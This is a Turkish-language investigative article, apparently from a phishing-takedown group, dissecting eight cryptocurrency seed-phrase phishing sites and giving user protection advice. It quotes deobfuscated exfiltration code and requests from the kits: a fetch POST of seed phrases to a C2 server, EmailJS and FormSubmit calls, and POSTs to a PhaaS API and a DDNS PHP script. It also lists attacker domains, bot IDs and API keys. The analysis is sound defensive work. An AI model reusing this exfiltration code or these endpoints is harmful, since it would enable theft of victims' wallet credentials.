Haberlere Geri Dön
Kapsamlı Soruşturma

Kripto Para Kimlik Avının Yapısı:
8 Gerçek Saldırının İncelenmesi

Canlı kimlik avı trafiğini engelledik, 5 adet tohum cümlesi hırsızını tersine mühendislik yoluyla inceledik ve çalınan verilerin izini Telegram botlarına, EmailJS hesaplarına ve “Hizmet Olarak Kimlik Avı” arka uçlarına kadar sürdük.

27 Mart 2026 PhishDestroy Araştırması Okuma süresi: 18 dakika
Kripto para dolandırıcılığı soruşturmasının analizi
Ele geçirilen kimlik avı trafiğinin canlı analizi, saldırı altyapısının tamamını ortaya koyuyor
8Analiz Edilen Siteler
7Veri Çıkarma Yöntemleri
1,824+Çalınan Kimlik Bilgileri
380+Cüzdan Markaları
$0Saldırganın Maliyeti

Bulgularımız

Her gün binlerce kripto para kullanıcısı, meşru cüzdan hizmetlerinden ayırt edilemeyen kimlik avı siteleri yüzünden paralarını kaybediyor. Peki ne oluyor? arkasında Sahte “Connect Wallet” düğmesi mi? Tohum ifadeniz aslında nereye gidiyor?

5 aktif kimlik avı sitesinden canlı HTTP trafiğini yakaladık, bu sitelerin kaynak kodlarının tamamını indirdik ve her bir veri sızdırma uç noktasını nihai hedefine kadar izledik. Bu araştırma, tohum cümlenizi girmenizi sağlayan sosyal mühendislik hilelerinden, bunu saldırgana gerçek zamanlı olarak ileten Telegram botuna kadar, modern kripto kimlik avının tüm yapısını ortaya koyuyor.

Yasal Uyarı

Bu makalede gösterilen tüm tohum ifadeleri, rastgele oluşturulmuş test verileridir. Bu soruşturma sırasında hiçbir gerçek kimlik bilgisi ele geçirilmemiştir. Tüm siteler, ilgili barındırma sağlayıcılarına ve kötüye kullanım birimlerine bildirilmiştir.

Evrensel Saldırı Şeması

Farklı marka isimleri ve arka uç sistemlerine rağmen, bu 8 kimlik avı sitesinin tamamı şu tamamen aynı psikolojik süreç:

Açılış SayfasıGüven oluşturma
Cüzdan Seçici60–110+ logo
Sahte "Bağlanıyor..."3–5 saniyelik zamanlayıcı
"Bağlantı Başarısız"Her zaman başarısız oluyor
Manuel GirişTohum / Anahtar / Anahtar deposu
Bilgi sızdırmaTG / E-posta / API

Önemli bir gözlem: “Bağlanıyor...” animasyonu her zaman başarısız olması için sabit kodlanmış. 4 numaralı sitenin kaynak kodunda şunu bulduk: const success = false — cüzdan bağlanma denemesi yapılmamaktadır. Tüm bu süreç, yalnızca kurbanları “Manuel Olarak Bağlan” formuna yönlendirmek amacıyla tasarlanmıştır.

Altı aşamalı kripto para dolandırıcılığı saldırı zinciri
Analiz ettiğimiz tüm kimlik avı sitelerinde ortak olarak görülen, 6 adımlı evrensel saldırı zinciri

8 Site: Ayrıntılı Analiz

1
Ağ Katmanı Protokolü
networklayers.pages.dev
CanlıCloudflare PagesTelegram Botu + EmailJS

Kimlik sahtekarlığı

Cüzdan doğrulaması için kurgusal bir “merkezi olmayan protokol”. Güvenilirlik sağlamak amacıyla canlı CryptoCompare fiyat göstergelerini ve gerçek blok zinciri gezginlerine (Ethereum, BSC, Polygon, Avalanche, Solana, Cardano) bağlantılar kullanır. Ana sayfada 100'den fazla cüzdan logosu ve 3 adımlı bir "doğrulama" süreci yer almaktadır.

Çift Sızıntı Zinciri

Beşinin en gelişmiş arka ucu — çalınan her kimlik bilgisi buradan gönderilir iki bağımsız kanal aynı anda:

Victim submits seed phrase
  |
  +--> Channel 1: axios POST --> Express.js on Render.com
  |      |
  |      +--> Telegram Bot API --> @metatech2 (instant DM)
  |
  +--> Channel 2: fetch POST --> EmailJS API
         |
         +--> Bestgrace309@gmail.com (email backup)

OSINT Bulguları

GöstergeDeğer
Dolandırıcı E-postasıBestgrace309@gmail.com
Telegram Botu@DewdropsTG_bot (Kimlik: 7567323692)
Telegram Alıcısı@metatech2 (Sohbet Kimliği: 7350941887)
Arka uçemailjs-backend-ovtg.onrender.com
EmailJS Hizmetiservice_d5qigxs / template_7bqxeaa
Gizli Etki Alanılayerschain.in (CF e-posta gizleme yönteminden)
Gönderilen Mesajlar1.824+ (Telegram mesaj_kimliğinden)
Alan Adı Yaşı2 gün (TLS: 25 Mart 2026)
OPSEC İhlali

Saldırganın e-posta adresi bir JavaScript yorumu içeride config.js: // Bestgrace309@gmail.com. Dağıtımdan önce bunu kaldırmayı unutmuşlar. Ayrıca, Telegram aktarım arka ucu tamamen açık durumda — ne kimlik doğrulama var, ne de hız sınırlaması. Cloudflare’in data-cfemail HTML’deki şifreleme sayesinde, gizli bir e-posta adresi de ortaya çıkardık: support@layerschain.in, Hindistan ve Güney Afrika’daki barındırma altyapısına bağlanarak.

2
AQLA Token'ı Taşıma İşlemi
token-aqla.pages.dev
CanlıCloudflare PagesStatik Olmayan Formlar

Kimlik sahtekarlığı

Gerçeğin piksel düzeyinde kusursuz bir kopyası Aqualibre (AQLA) token taşıma sayfası. HTML kodunda kaynağı gösteren bir meta veri etiketi bulunmaktadır: data-scrapbook-source="https://token.aqla.app/migration", 19 Kasım 2024 tarihli.

Sıfır Kod Yaklaşımı

Bu saldırganın şunlara ihtiyacı vardır: sunucu tarafında hiç kod yok. Form doğrudan şu adrese gönderilir: Statik Olmayan — statik siteler için meşru bir form arka ucu. Her gönderim, dolandırıcının e-posta adresine iletilir. Saldırganın e-posta adresi kaynak kodunda hiçbir zaman görünmez.

<form action="https://forms.un-static.com/forms/c78173e2d991...94c3f76">
  <textarea name="phrase"></textarea>
  <input name="private-key" />
  <textarea name="keystore-json"></textarea>
  <input name="password" />
</form>
Maliyet: 0 $

Cloudflare Pages: ücretsiz. Un-static Forms: ücretsiz. Satın alınan alan adı yok. Kiralanan sunucu yok. Toplam altyapı maliyeti: sıfır dolar.

3
SafePal Yazım Hatası Kapatma
antiresolve-mysafpalnode.pages.dev
Canlı Cloudflare Pages Statik Olmayan Formlar

Kimlik sahtekarlığı

Alt etki alanı " içerirsafpal" — bir kasıtlı yazım hatası olan SafePal, popüler bir donanım cüzdanı. Site, 26 sahte konu kategorisi ile "Blockchain Wallet Rectification" adını kullanıyor. Typed.js’yi kullanarak zincir adlarını (Ethereum, BSC, Polygon...) canlandırıyor ve güvenilirlik yaratmak için bir LiveCoinWatch ticker’ı kullanıyor.

Aynı Kit, Aynı Operatör mü?

Şunu kullanır: tamamen aynı kimlik avı şablonu 2 numaralı site olarak: aynı connect.html, aynı wallets.html 60'tan fazla logoyla, aynı Un-static arka ucu (farklı form kimliği — 6f1b82c3...da9943af). Aynı kit, şunu kuvvetle akla getiriyor: Her iki tesisi de tek bir operatör işletiyor.

Koddaki hatalar: "Privay Policy" (c harfi eksik), "seperated" (doğrusu "separated"), "Kestore" (y harfi eksik). Şifre alanı şunu kullanıyor: type="text" yerine type="password".

4
Flare Network Klonu
flaremainnet.pages.dev
CanlıCloudflare PagesÇift EmailJS (Yedeklilik)

Kimlik sahtekarlığı

'nin neredeyse kusursuz bir kopyası Flare Ağı portal — FTSO ve Data Connector protokollerine sahip gerçek bir Katman-1 EVM blok zinciri. 30’dan fazla ekosistem ortağını, gezinme özelliklerini ve markalaşma unsurlarını taklit eder. Favikonlar bir typosquat adresinden yüklenir: portal.flaremainet.com ("mainnet" kelimesinde bir "n" eksik).

E-postaJS’de Çift Yedekleme

Bunu kullanan tek site iki ayrı EmailJS hesabını aynı anda kaldırılmaya karşı yedeklilik amacıyla:

// Channel 1: EmailJS SDK
emailjs.send('service_6dt5h1k', 'template_hjqp9gb', payload)
// Key: Sza6lhzA9hKHrm1k4

// Channel 2: jQuery AJAX direct
$.ajax('https://api.emailjs.com/api/v1.0/email/send', {
  data: { service_id: 'service_isy47de',
          template_id: 'template_dkk4d1b',
          user_id: 'JsVEgXVcaSTro1etu' }
})

Her hırsızlık vakası için e-posta konusu: "New Wallet Details from Flare".

Bu, Finansman Sağlanmış Bir İşletmedir

HTML'de şunlar yer almaktadır: Google Etiket Yöneticisi (GTM-WX2D2TR), Microsoft Clarity (j4bllybjkp), Lunio PPC korumasıve bir Twitter/X Reklamları pikseli. Saldırgan şu programı çalıştırıyor: ücretli reklamcılık kurbanları kimlik avı sitesine yönlendirmek ve bot tıklamalarını filtrelemek amacıyla. Bu bir hobi değil — analitik araçları ve reklam harcamalarıyla desteklenen, finansmanı sağlanmış bir operasyon.

EmailJS ve ücretli reklamları bir arada barındıran Flare Network kimlik avı sitesi
4. Site: ücretli reklamlar, analiz izleme ve çift veri sızdırma — en profesyonel operasyon
5
COIN NODE / Cüzdan Düzeltmesi (PhaaS)
swiftauthapps.pages.dev
Arka Uç ÇalışmıyorPulseResolve API (PhaaS)

Kimlik sahtekarlığı

Genel bir "COIN NODE" / "Wallet Fix" hizmeti (belirli bir marka yok). Telif hakkı "Wallet Fix 2022" — bu kit şablonu en az 4 yıllık. Görüntüler şu adreste barındırılıyor: pumpeth.com (AWS üzerinde WordPress).

Hizmet Olarak Kimlik Avı

En endişe verici arka uç mimarisi: bir UUID tabanlı çoklu kiracılı API:

POST https://api.pulseresolve.com/a26db20c-1dc4-4208-a60a-c2c3b22c02ef
Content-Type: multipart/form-data

wallet=Metamask&type=phrase&phrase=buddy+surprise+vapor+river+...

Her dolandırıcıya kendine ait bir UUID uç noktası verilir. Merkezi bir operatör, API’yi yönetir, kampanyaları takip eder ve çalınan paradan bir pay alabilir. Bu, endüstriyel ölçekte kripto hırsızlığı — bir “Phishing-as-a-Service” modeli.

İlgili Altyapı (Çoğunlukla İşlevsiz)

Etki AlanıGörevDurum
api.pulseresolve.comVeri Sızdırma API’siNXDOMAIN
walletissuesfix.netFavicon barındırma hizmetiNXDOMAIN
syncwallet.onlineLogo barındırma hizmetiNXDOMAIN
pumpeth.comGörsel CDNCanlı (AWS)
Zombie Ön Uç

Arka uç çalışmıyor, ancak ön uç hâlâ çalışır durumda Cloudflare Pages üzerinde. Saldırgan yeniden kayıt yaptırırsa pulseresolve.com, site anında yeniden çalışır hale gelir.

6
Destek Merkezi + Defter Kurtarma
wallet-support-39n.pages.dev & ledger-recovery.support
CanlıCloudflare Pages + ReplitÖzel C2 API'siBIP39 Otomatik Tamamlama

Kimlik sahtekarlığı

A iki yönlü operasyon: şu adresteki genel bir "Destek Merkezi" wallet-support-39n.pages.dev 15 sahte ürün kategorisi ve 39 cüzdan markası ile, ayrıca bir Piksel düzeyinde kusursuz Ledger kayıt süreci klonu 'de ledger-recovery.support Replit üzerinde barındırılan — cihaz modeli seçimi, PIN ayarı ve 24 kelimelik tohum cümlesi tablosu ile birlikte gerçek BIP39 otomatik tamamlama.

Anti-Scanner C2 Arka Ucu

Cüzdan destek sayfası, çalınan verileri şu adrese gönderir: api.uranustoken.org/log — Cloudflare arkasında çalışan özel bir nginx/Ubuntu C2. Arka uç tüm GET isteklerini kasıtlı olarak reddediyor (522 zaman aşımı hatası veriyor), yalnızca POST isteklerine yanıt veriyor. Bu, URL tarayıcılarının, Google Safe Browsing tarayıcılarının ve GET isteğiyle uç noktaya ping gönderen güvenlik araştırmacılarının hiçbir şey görememesi anlamına gelir — C2 sunucusu devre dışı gibi görünür.

// config.js — C2 config exposed in plaintext
const config = {
  serverURL: "https://api.uranustoken.org",
  allowedWallets: ["phantom","solfare","metamask","trustwallet",
    "coinbasewallet","ledger","trezor","okx","sui","backpack",
    "tonkeeper","magiceden","slush" /* + 26 more */]
};
window.IWMConfig = config;

// Exfiltration function (deobfuscated from bundle)
function Ae(seedPhrase, passPhrase, walletName) {
  fetch(serverURL + "/log", {
    method: "POST",
    headers: {"Content-Type": "application/json"},
    body: JSON.stringify({seedPhrase, passPhrase, walletName, apiKey})
  })
}

Ledger klonu, Replit platformu üzerinde ayrı bir Express.js arka ucu çalıştırıyor: POST /api/recovery-phrase toplama {deviceId, pin, phrase}. Sonuç olarak 400 {"error":"Invalid data provided"} hatalı biçimlendirilmiş girdi durumunda — arka ucun canlı ve aktif olarak doğrulama aşamasında çalınan veriler.

OSINT Bulguları

GöstergeDeğer
Ön Uç (Cüzdan)wallet-support-39n.pages.dev
Ön Uç (Ledger)ledger-recovery.support (34.111.179.208)
C2 Arka Uç api.uranustoken.org → nginx/1.24.0 Ubuntu
C2 IP'leri104.21.60.163 / 172.67.198.35 (Cloudflare)
Replit Doğrulamaa43d3852-5304-47af-a61b-f0f6f3912736
Kayıt SorumlusuName.com (ledger-recovery.support)
Yerleştirildi9 Ocak 2026 (Last-Modified başlığı)
Teknoloji Yığını React + Vite + Tailwind v4.1 + Framer Motion
En Yüksek Kullanıcı Deneyimi Doğruluğu

466 KB boyutundaki JS paketi şunları içerir: tam BIP39 kelime listesi gerçek zamanlı otomatik tamamlama özelliği için “passphrase” terimine 67, “mnemonic” terimine ise 39 kez atıfta bulunulmuştur. Ledger klonu, kurbanları gerçek bir Ledger cihazıyla tamamen aynı kurulum sürecinden geçiriyor — bu, tüm soruşturma boyunca karşılaşılan en inandırıcı kimlik avı sayfasıdır. Bu apiKey yapılandırmadaki bu alan şunu öneriyor: çoklu kiracılı PhaaS mimarisi.

7
Merkezi Olmayan Lansman Platformu
mainnetvalidationapp.pages.dev
CanlıCloudflare PagesFormSubmit.co

Kimlik sahtekarlığı

Aşağıdakileri içeren genel bir "Merkezi Olmayan Lansman Platformu": 21 yem kategorisi (Staking, Geçiş, KYC, Hediye Kampanyası, Ödülleri Al, Varlık Kurtarma, Ön Satış, NFT Basımı, Kilitli Hesaplar...) ve 70'den fazla cüzdan markası — karşılaştığımız en kapsamlı cüzdan listelerinden biri. “Sychronize” (burada ‘n’ harfi eksik) şeklindeki bariz yazım hatası, bunun sahte olduğunu ele veriyor.

FormSubmit Pipeline

Kullanım Alanları FormSubmit.co — meşru bir “formdan e-postaya” hizmeti. Uç nokta hash’i a2cf4131f1a5d39453c7c183df96f86f dolandırıcının e-posta adresinin MD5 değeridir. Gmail, Yahoo, Hotmail, ProtonMail, Yandex ve Mail.ru’da yüzlerce e-posta şablonunu brute force yöntemiyle denedik — eşleşme yok. Dolandırıcı, nadir görülen veya rastgele oluşturulmuş bir e-posta adresi kullanır.

// Exfiltration via jQuery AJAX → FormSubmit → scammer email
$.ajax({
    url: "https://formsubmit.co/ajax/a2cf4131f1a5d39453c7c183df96f86f",
    method: "POST",
    dataType: "JSON",
    data: {
        dappWord: seedPhrase,       // THE STOLEN SEED PHRASE
        dappName: walletName,       // Which wallet was selected
        linkName: "DAPP DECENTRALIZED"  // Campaign identifier
    }
});

OSINT Bulguları

GöstergeDeğer
Etki Alanımainnetvalidationapp.pages.dev
Form Gönderme Hash'ia2cf4131f1a5d39453c7c183df96f86f
Kampanya KimliğiDAPP MERKEZİ OLMAYAN
FontAwesome Kitibdc3291137 (kit no. 112310842, ücretsiz v6.7.2)
jQuery3.2.1 ve 3.5.1 sürümleri aynı anda yüklendi
BootstrapCSS 5.2.2 + JS 5.3.0-alpha1 (uyumsuzluk)
İki adet taşıma kolu

FontAwesome Kiti bdc3291137 — FontAwesome, bu kit kimliğinin ardındaki hesap sahibini tespit edebilir. Kampanya etiketi DAPP DECENTRALIZED aynı FormSubmit hash değerini kullanan diğer kimlik avı sitelerinde de görünebilir. Tohum cümlesini çaldıktan sonra, bir sahte QR kodu ve rastgele 7 karakterlik referans kodu şu mesaj görüntüleniyor: "Benzersiz referans kodunuzla yöneticiye başvurun" — soruşturma yapmak yerine mağdurları bekletmek.

8
R2 Bucket + Ev Bilgisayarında PHP
pub-519769e9eb634616b1746c2018641d56.r2.dev
ÖlüCloudflare R2PHP + DDNS

Kimlik sahtekarlığı

Bilinmiyor — hem ön uç hem de arka uç çevrimdışı durumda. Yük yapısına göre, bu bir kripto cüzdan tohum cümlesi hırsızlığı saldırısıydı. Bu Cloudflare R2 genel depolama alanı (nesne depolama, Pages değil) bir iyi belgelenmiş bir kimlik avı yöntemi Netskope tarafından 5.000'den fazla zararlı sayfa tespit edildi ve trafiğin 61 kat arttığı bildirildi.

Script Kiddie Kurulumu

En temel işlem bu koleksiyonda. Tohum ifadeleri gönderilir kelime kelime ücretsiz Dinamik DNS üzerinden ev bilgisayarı veya VPS üzerinde çalışan bir PHP betiğine:

POST mercifuljigga4real123.publicvm.com/fuc.php
Content-Type: application/x-www-form-urlencoded

pass=Word+1:+finger+%0AWord+2:+flag+%0AWord+3:+across
    +%0AWord+4:+admit+%0AWord+5:+weather+%0AWord+6:+fragile
    +%0AWord+7:+trick+%0AWord+8:+weekend+%0AWord+9:+gift
    +%0AWord+10:+grit+%0AWord+11:+borrow+%0AWord+12:+access

OSINT Bulguları

GöstergeDeğer
Ön Uç pub-519769e9eb634616b1746c2018641d56.r2.dev [ÇEVRİMDIŞI]
Arka uç mercifuljigga4real123.publicvm.com [NXDOMAIN]
R2 Kova Kimliği519769e9eb634616b1746c2018641d56
DDNS Sağlayıcısı DNSExit.com / Netdorm, Inc. (Cincinnati, OH)
DNS NSns10–13.dnsexit.com
Kullanıcı adımercifuljigga4real123
OSINT kullanıcı adı: mercifuljigga4real123

"Merciful" + "jigga" (Jay-Z'nin takma adı) + "4real" + "123" — hip-hop kültürüne yakınlığını yansıtan, son derece kişisel bir kullanıcı adı. Bulunamadı herhangi bir indekslenmiş platformda: GitHub, X, Instagram, TikTok, Reddit, YouTube, Twitch veya Steam. Muhtemelen Discord, Telegram veya oyun platformlarında bu isimle ya da buna yakın varyasyonlarla aktiftir. Dosya adı fuc.php tutamağın cüretkar tarzına uyuyor.

Tohum İfadenizi Çalmanın 7 Yöntemi

Dört kripto para dolandırıcılığı yoluyla veri sızdırma yönteminin karşılaştırılması
8 oltalama sitesinde kullanılan yedi farklı veri sızdırma mimarisi
YöntemSitelerNasıl Çalışır?HızMaliyet
Telegram Botu#1 Render.com üzerindeki Express.js, Bot API’ye yönlendirir. Dolandırıcı, kimlik bilgilerini içeren anlık bir özel mesaj alır. Gerçek zamanlı$0
EmailJS#1, #4 İstemci tarafındaki JavaScript, verileri doğrudan EmailJS API’ye gönderir; bu API de verileri dolandırıcının e-posta adresine iletir. ~1 dakika$0
Statik Olmayan Formlar#2, #3 Gönderimleri e-posta yoluyla ileten meşru bir form hizmetine yapılan standart HTML form POST isteği. ~1 dakika$0
FormSubmit.co#7 jQuery AJAX ile FormSubmit.co'ya gönderim. E-posta adresi MD5 hash ile gizlenmiştir. Kampanya, "DAPP DECENTRALIZED" etiketiyle işaretlenmiştir. ~1 dakika$0
Özel C2 API'si#6 React SPA, Cloudflare’in arkasındaki nginx/Express API’sine istek gönderir. GET isteklerini keser (522) tarayıcılardan kaçmak için. Yalnızca POST isteklerine yanıt verir. Gerçek zamanlı~5 $/ay
PHP + DDNS#8 Ücretsiz Dinamik DNS (publicvm.com) aracılığıyla ev bilgisayarında çalışan bir PHP betiği. Tohum cümlesi kelime kelime gönderiliyor. Gerçek zamanlı$0
PhaaS API'si#5 UUID tabanlı çoklu kiracılı API. Merkezi operatör arka ucu yönetir, dolandırıcılar ise uç noktaları kiralar. Gerçek zamanlıBilinmiyor

Her Kimlik Avı Sitesini Ortaya Çıkaran 7 Uyarı İşareti

Eğer görürseniz herhangi bir Bunlardan herhangi biriyle karşılaşırsanız, sekmeyi derhal kapatın:

1. “Bağlantı Başarısız” mesajı her zaman sahte

Gerçek cüzdan bağlantıları, WalletConnect protokolünü veya tarayıcı uzantılarını kullanır. Bu bağlantılarda, tohum cümlenizi girmenizi isteyen bir “Bağlantı Başarısız” hatası asla görüntülenmez.

2. 50–110+ cüzdan logosu, tek bir yer

Her cüzdan simgesi aynı forma yönlendirir. Gerçek bir hizmet, her bir cüzdanın kendi SDK’sını entegre ederdi.

3. Gönderme işleminden sonra "Hata" mesajı

Gönderimden sonra ortaya çıkan sahte “503 Hatası” veya “Bilinmeyen Hata” mesajı kasıtlıdır. Verileriniz çoktan çalınmıştır — bu hata, sizi başka bir cüzdanla tekrar denemeye yönlendirmek için bir tuzaktır.

4. .pages.dev üzerinde barındırılıyor

Bu 5 sitenin tamamı Cloudflare Pages’ın ücretsiz kademesini kötüye kullanıyor. Kimlik doğrulaması gerekmiyor. Cloudflare Pages’da kimlik avı amaçlı kötüye kullanım, 2025 yılında %198 arttı.

5. Üç sekme: İfade / Özel Anahtar / Anahtar Deposu

Hiçbir meşru hizmet bu üç kimlik bilgisi türünün hepsine ihtiyaç duymaz. Bu üç sekmeli form, bir kimlik avı kitinin tipik bir özelliğidir.

6. Blok zinciri ile herhangi bir etkileşim yok

Bu sitelerin hiçbiri yüklenmiyor ethers.js, web3.js, ya da herhangi bir RPC çağrısı yapamazlar. Bunlar, dApp gibi görünen saf HTML formlarıdır.

7. Sıfır maliyetli altyapı

Ücretsiz barındırma + ücretsiz form hizmetleri + ücretsiz mesajlaşma = 0 dolara tam donanımlı bir kimlik avı operasyonu. Sitenin gerçek bir alan adı yoksa, şüphelenin.

Tam IOC Tablosu

Güvenlik ekipleri, tehdit istihbarat platformları ve kötüye kullanım bildirimcileri için:

Alan Adları ve Altyapı

Etki AlanıTürDurum
networklayers.pages.devKimlik avı ön ucuCanlı
token-aqla.pages.devKimlik avı ön ucuCanlı
antiresolve-mysafpalnode.pages.devKimlik avı ön ucuCanlı
flaremainnet.pages.devKimlik avı ön ucuCanlı
swiftauthapps.pages.devKimlik avı ön ucuCanlı
emailjs-backend-ovtg.onrender.comTG röle arka ucuCanlı
portal.flaremainet.comYazım hatası içeren alan adlarıBilinmiyor
layerschain.inİlgili alan adıDNS çalışmıyor
api.pulseresolve.comPhaaS arka ucuNXDOMAIN
walletissuesfix.netVarlık barındırma hizmetiNXDOMAIN
syncwallet.onlineLogo barındırma hizmetiNXDOMAIN
pumpeth.comGörsel CDNCanlı (AWS)
wallet-support-39n.pages.devKimlik avı ön ucuCanlı
ledger-recovery.supportLedger kimlik avı (Replit)Canlı
api.uranustoken.orgC2 arka ucu (nginx/Ubuntu)Canlı
uranustoken.orgKök etki alanı404
mainnetvalidationapp.pages.devKimlik avı ön ucuCanlı
pub-519769e9eb634616b1746c2018641d56.r2.devKimlik avı (R2 grubu)Çevrimdışı
mercifuljigga4real123.publicvm.comPHP arka ucu (DDNS)NXDOMAIN

Hesaplar ve Kimlik Bilgileri

TürDeğerSite
E-postaBestgrace309@gmail.com#1
E-posta (gizli)support@layerschain.in#1
Telegram Botu@DewdropsTG_bot (7567323692)#1
Telegram Kullanıcısı@metatech2 (7350941887)#1
EmailJS #1service_d5qigxs / I-7q0Bs-ilK3rFcWj#1
EmailJS #2service_6dt5h1k / Sza6lhzA9hKHrm1k4#4
EmailJS #3service_isy47de / JsVEgXVcaSTro1etu#4
Statik Olmayan Formc78173e2d991...94c3f76#2
Statik Olmayan Form6f1b82c3ce55...da9943af#3
PhaaS UUID'sia26db20c-1dc4-4208-a60a-c2c3b22c02ef#5
GTMGTM-WX2D2TR#4
MS Clarityj4bllybjkp#4
Render Örneğirndr-id: ed83576e-b1b3-4c82#1
Replit Doğrulamaa43d3852-5304-47af-a61b-f0f6f3912736#6
Form Gönderme MD5a2cf4131f1a5d39453c7c183df96f86f#7
Kampanya EtiketiDAPP MERKEZİ OLMAYAN#7
FontAwesome Kitibdc3291137 (set no. 112310842)#7
R2 Kova Kimliği519769e9eb634616b1746c2018641d56#8
Kullanıcı Adı/DDNSmercifuljigga4real123#8

Kripto Para Kimlik Avı Olaylarını Nereye Bildirmeli?

Kripto para dolandırıcılık sitelerini nereye bildirmeli — çok yönlü kaldırma operasyonu
Maksimum kaldırma hızı elde etmek için barındırma, arka uç hizmetleri ve mesajlaşma platformlarını aynı anda hedeflemek
HizmetNeler Bildirilmelidir?Nasıl
Cloudflare7 adet .pages.dev + 1 adet R2 depolama alanıabuse.cloudflare.com
Google Safe BrowsingTüm kimlik avı URL’leriOltalama Girişimini Bildir
PhishTankTopluluk engelleme listesine ait tüm URL’lerphishtank.org
EmailJS3 adet kötüye kullanılmış hesap (yukarıdaki hizmet kimlikleri)abuse@emailjs.com
Statik Olmayan2 form uç noktasıun-static.com üzerinden iletişime geçin
Render.comTelegram aktarım arka ucuKötüye kullanım bildirim formunu gönder
Telegram@DewdropsTG_bot + @metatech2telegram.org/support
Google (Gmail)Bestgrace309@gmail.comGoogle'a kötüye kullanım bildirimi
Twitter/X4 numaralı siteyi tanıtan reklam hesabıX reklamları kötüye kullanım bildirimi
FormSubmit.coHash a2cf4131... (#7)Form Gönderme – Kötüye Kullanım Bildirim Formu
Replitledger-recovery.support (#6)Replit kötüye kullanım bildirimi
Name.comledger-recovery.support için kayıt sorumlusuName.com kötüye kullanım
DNSExitmercifuljigga4real123.publicvm.comdnsexit.com kötüye kullanım
FontAwesomeKit bdc3291137 (#7)FontAwesome'ın kötüye kullanımı
ChainabuseTüm kimlik avı kampanyalarıChainabuse.com

Kendinizi Nasıl Koruyabilirsiniz?

Altın Kural

Hiçbir meşru hizmet, sizden bir web sitesine tohum cümlenizi girmenizi istemez. Tohum ifadeleri yalnızca cüzdanın kurtarılması sırasında resmi cüzdan yazılımına girilir — asla üçüncü taraf "doğrulama", "senkronizasyon" veya "kurtarma" web sitelerine girilmez.

Herhangi bir cüzdanı bağlamadan önce:

  • URL’nin resmi alan adıyla eşleştiğini doğrulayın. SSL sertifikasının ayrıntılarını kontrol edin.
  • Gerçek WalletConnect, bir QR kodu veya derin bağlantı kullanır — asla tohum cümlesi biçimini kullanmaz.
  • Eğer "bağlantı kurulamadı" mesajı çıkarsa ve sizden kimlik bilgilerinizi manuel olarak girmeniz istenirse — bu bir kimlik avıdır.
  • Şüpheli URL’leri şu adresten kontrol edin: PhishTank veya VirusTotal etkileşime geçmeden önce.
  • Bir donanım cüzdanı kullanın — bu cüzdan, her işlem için fiziksel onay gerektirir.
  • Resmi URL’leri yer imlerine ekleyin. Reklamlardaki, özel mesajlardaki veya sosyal medyadaki bağlantılara asla tıklamayın.

Kripto Kimlik Avı Sınıflandırması

Tohum cümlesi hırsızları sadece bir kategoridir. İşte kripto para dolandırıcılığının genel tablosu — her bir tür hakkında ayrıntılı analizler ekleyeceğiz.

Tohum İfadesi Çalıcıları
Sizi kurtarma ifadesini girmeye yönlendiren sahte “Connect Wallet” sayfaları. Bu makalenin odak noktası: 5 gerçek örneğin ayrıntılı analizi.
Yukarıda Ele Alınan Konular
Onay Kaçırma
MetaMask üzerinden sınırsız token onayı talep eden kötü niyetli dApp’ler. Onay verildikten sonra saldırgan, tohum cümlenize ihtiyaç duymadan cüzdanınızı boşaltır.
Yakında
Ice Phishing (Permit2)
EIP-2612’nin gaz gerektirmeyen izinlerini istismar eder. Kurban, token aktarım haklarını veren zincir dışı bir mesaja imza atar — varlıkların boşaltılmasına kadar zincir üzerinde herhangi bir onay görünmez.
Yakında
Sahte Airdrop İddiaları
Kötü niyetli bir akıllı sözleşme aracılığıyla “talep edilmesi” gereken sahte token dağıtımları. Bu talep işlemi, aslında gerçek tokenlerinizi başka bir yere aktarır.
Yakında
Pano Ele Geçiriciler
Panonuzu izleyen ve kopyaladığınız cüzdan adreslerini, yapıştırmadan önce sessizce saldırganın adresiyle değiştiren kötü amaçlı yazılım.
Yakında
Tozlanma + Zehirlenme
Birbirine benzeyen adreslerden yapılan küçük işlemler, işlem geçmişinizi kirletir. Mağdur, bir sonraki transferi için işlem geçmişinden sahte adresi kopyalar.
Yakında

Rahatsız Edici Gerçek

Bir kripto para dolandırıcılığı operasyonunu kurmanın maliyeti $0 ve sürer 30 dakikadan az. Ücretsiz barındırma, ücretsiz form hizmetleri, ücretsiz mesajlaşma botları. 1 numaralı sitenin arkasındaki saldırgan, halihazırda şu sitelerden kullanıcı bilgilerini ele geçirmiştir: 1.824'ten fazla mağdur. 4 numaralı tesis şu anda çalışır durumda ücretli reklamcılık büyüklüğüne göre. Bu amatörlerin işi değil — bu bir endüstri. Tek savunma yolu farkındalıktır.

Mücadelemize Destek Olun

PhishDestroy, kripto para dolandırıcılığı sitelerini gerçek zamanlı olarak takip eder ve bildirir. Şüpheli bir siteyle karşılaştıysanız, bunu bize bildirin — durumu inceleyeceğiz ve sitenin kaldırılması için çalışacağız.

İlgili Soruşturmalar

Soruşturma
xmrwallet.com’un Sonu: NameSilo, Bir M Hırsızını Korumak İçin Yalan Söyledi
10 yıllık Monero hırsızlığı. 3 kayıt şirketi olaya müdahil oldu. NameSilo 7 yalan uydurdu.
Derinlemesine İnceleme
Kripto Hırsızlığı Ağları: Altyapı Ortaya Çıktı
“Hizmet Olarak Süzgeç” işletmeleri altyapı ve operatörleri nasıl paylaşıyor?
Panelin Açığa Çıkması
Trust Wallet Kimlik Avı Paneli: Tam Yönetici Erişimi
Trust Wallet’a yönelik bir kimlik avı operasyonunun yönetici paneline erişim sağladık.
Altyapı
Dolandırıcılık Altyapısı Ortaya Çıktı: Ortak Arka Uçlar
Dolandırıcılık operasyonları sunucuları, şablonları ve ödeme akışlarını nasıl paylaşır?

Bu Araştırmayı Paylaş

X / Twitter Telegram Reddit LinkedIn

İlgili Soruşturmalar

Trust Wallet Kimlik Avı Paneli: 239 bin dolar çalındı, 6 operatör
KAPSAMLI SORUŞTURMA
Trust Wallet Kimlik Avı Paneli: 239 bin dolar çalındı, 6 operatör
Crypto Drainer Araç Seti: Angel Drainer Satıcıları Ortaya Çıktı
KAPSAMLI SORUŞTURMA
Crypto Drainer Araç Seti: Angel Drainer Satıcıları Ortaya Çıktı
Dolandırıcılar Ortaya Çıktı: 4 Dolandırıcılık Arka Ucu İncelendi
SORUŞTURMA
Dolandırıcılar Ortaya Çıktı: 4 Dolandırıcılık Arka Ucu İncelendi